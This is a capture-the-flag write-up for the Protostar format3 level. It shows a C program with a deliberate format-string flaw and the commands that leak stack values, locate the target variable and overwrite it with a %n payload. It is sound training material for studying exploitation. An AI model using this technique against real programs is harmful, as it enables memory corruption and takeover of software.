Protostar Format3 – Writeup

I love to test Format String vulnerable because it fun. Let’s get start.

Description

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.

Format3.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
  printf(string);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);
  
  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}

In this task,we need to change the value 0x01025544 of target variable.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "%08x"')) | ./format3
00000000
target is 00000000 :(

Test with input value (AAAA)

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format3
AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.
target is 00000000 :(

41414141 is locate on 12 😀 .

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%12$08x."')) | ./format3
AAAA41414141.
target is 00000000 :(

Pretty Good!. Let’s change the value but we need to get the address of target variable. so we can use objdump

[email protected]:/opt/protostar/bin$ objdump -t ./format3 | grep target
080496f4 g     O .bss	00000004              target

Exploit it

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%12$08n"')) | ./format3
��
target is 00000004 :(

Target is 4 but we need to change another flag value. we can use let command to get the length.

[email protected]:/opt/protostar/bin$ let x=0x01025544; echo $x;
16930116

Need to remove 4 bytes AAAA 16930116 – 4 and use %u for hex.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%16930112u"+"%12$08n"')) | ./format3

Bango! We got it! Thanks for reading. Happy Hacking.